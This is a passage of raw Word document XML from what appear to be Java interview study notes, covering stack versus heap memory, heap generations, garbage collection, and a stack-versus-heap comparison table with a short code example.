        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ame and arr point to heap objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17195D6F" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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references name and arr are stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43221D27" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0088088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449084D">
          <v:rect id="_x0000_i1285" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC532FE" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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Heap Memory Management Phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41FB3D" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Young Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04501926" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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hort-lived objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE16CF2" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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cludes Eden and Survivor spaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D44D9" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ld (Tenured) Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE716DE" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ng-living objects promoted from Young Gen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B651AEA" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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aspace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java 8+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C65BCC" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ores class metadata (previously part of PermGen)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC8451" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0088088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0D016D7">
          <v:rect id="_x0000_i1286" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2CDDC9" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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Garbage Collection in Heap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37453100" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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JVM automatically reclaims memory from unreachable objects in heap via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Garbage Collector (GC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475A3B0" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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C strategy (like G1GC, CMS, etc.) depends on the JVM configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C09DF" w14:textId="61B83C88" w:rsidR="00051BE0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00051BE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3967E490">
          <v:rect id="_x0000_i1287" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC36CB" w14:textId="77777777" w:rsidR="00BB57EF" w:rsidRPr="00CE4B95" w:rsidRDefault="00BB57EF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc196307582"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Stack and Heap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="057DEF7E" w14:textId="39D07D3F" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">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ere's a clear and concise comparison of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stack vs Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B596D6B" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F709F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6BA34C1">
          <v:rect id="_x0000_i1288" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C78800" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">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tack vs Heap Memory in Jav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9"/>
        <w:gridCol w:w="3828"/>
        <w:gridCol w:w="4477"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="66C080CC" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41B93194" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">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78AFE2D6" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">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ack Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E9E3769" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">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eap Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="23AA6FBC" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="021A0128"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AAB165A"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ores method calls, local variables, and references</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="508544BA"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ores objects, class instances, arrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="5796F4DC" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C8D42CE"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Allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3248CBED"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tic memory allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC41CF0"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ynamic memory allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="5C4AFF31" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="553C754F"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 Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B6D4C4B"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aster (LIFO - Last In First Out)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B147EA2"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lower than stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="60F79644" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="442CDBD5"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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FA5CD7"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cal to the method/thread</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AC84B25"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lobal (shared across all threads unless marked thread-local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="031D137B" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="154CA804"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 Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D657DA"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 (each thread has its own stack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F51B18"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needs synchronization for thread safety)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="690471CE" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D810C29"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fetime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ABC3666"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ists till the method completes execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="117FA5B3"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bjects exist until garbage collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="79EED5F8" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8EEB5D"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ored Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07E82E79"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Primitive local variables- References to objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="714B89B5"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Actual objects- Arrays- Instance variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="1F864604" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A93769D"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Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="663A580C"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ndled automatically via function calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6750BD97"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ndled via Garbage Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F709F7" w:rsidRPr="00CE4B95" w14:paraId="30383FE4" w14:textId="77777777" w:rsidTr="00B02399">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D38BA1A"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verflow Possibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04486F8F"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ckOverflowError if stack is full</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69EC7B04"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utOfMemoryError if heap is exhausted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78F7D5D5" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F709F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0869401">
          <v:rect id="_x0000_i1289" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D33B92" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">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00A13F29"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4500C9AE"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4A46047C"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x = 10;                      // x is stored in Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26DA0B"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name = new String("Hi"); // "Hi" object in Heap, 'name' reference in Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87BF66"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EC67902" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F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F1D0A1C" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F709F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5E88D34">
          <v:rect id="_x0000_i1290" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819997B" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6921DE32" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for lightweight operations (method calls, temporary variables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53560E30" w14:textId="77777777" w:rsidR="00B02399" w:rsidRPr="00CE4B95" w:rsidRDefault="00B02399" w:rsidP="00F709F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when creating objects that need to persist beyond the method scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909F8E2" w14:textId="05B833D1" w:rsidR="00051BE0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00051BE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7E9DC5BF">
          <v:rect id="_x0000_i1291" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D81E1" w14:textId="03E154D0" w:rsidR="00D569F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D569F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc196307583"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="00AB178F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">arbage </w:t>
      </w:r>
      <w:r w:rsidR="00FD7658" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ollection in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="23B5B1FD" w14:textId="0DD38278" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Garbage Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of identifying and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reclaiming memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by objects that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no longer reachable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
